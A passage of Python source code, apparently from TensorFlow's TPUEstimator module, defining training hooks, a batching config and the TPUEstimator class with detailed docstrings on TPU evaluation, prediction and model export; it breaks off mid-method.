class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an EmbeddingConfigSpec instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None,
experimental_export_device_assignment=self
._experimental_export_device_assignment,
call_context=self._ctx)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
# For SLICE mode (Eval/Predict), the batch_size within TPUEstimator is
# not the same as in user input_fn. In TPUEstimator, the batch_size is
# `per_replica_batch_size` * `num_replicas`, while in user input_fn,
# the batch_size is just `per_replica_batch_size`. Here, the value of
# params['batch_size'] always refer to the value in user input_fn.
if ctx.is_input_slice_broadcast_to_all_cores() and ctx.num_replicas > 0:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn // ctx.num_replicas)
else:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
